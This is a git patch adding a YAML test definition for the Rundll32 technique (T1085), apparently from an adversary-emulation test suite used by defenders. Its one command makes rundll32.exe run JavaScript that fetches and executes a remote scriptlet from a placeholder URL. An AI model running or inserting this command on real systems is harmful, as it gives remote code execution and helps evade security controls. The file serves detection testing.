From ba333046de54eccf70a2ba41e7a6f2ee7daf2146 Mon Sep 17 00:00:00 2001
From: Brian Beyer <brian@redcanary.com>
Date: Sat, 12 May 2018 23:09:43 +0200
Subject: [PATCH] add t1085 from yamlize branch

---
 atomics/t1085/t1085.yaml | 17 +++++++++++++++++
 1 file changed, 17 insertions(+)
 create mode 100644 atomics/t1085/t1085.yaml

diff --git a/atomics/t1085/t1085.yaml b/atomics/t1085/t1085.yaml
new file mode 100644
index 00000000..b1628ac6
--- /dev/null
+++ b/atomics/t1085/t1085.yaml
@@ -0,0 +1,17 @@
+attack_technique: T1085
+display_name: Rundll32
+atomic_tests:
+- name: Rundll32 execute JavaScript Remote Payload With GetObject
+  description: |
+    Test execution of a remote script using rundll32.exe
+  supported_platforms:
+    - windows
+  input_arguments:
+    file_url:
+      description: location of the payload
+      type: Url
+      default: https://www.example.com/1085.sct
+  executor:
+    name: command_prompt
+    command: |
+      rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}")"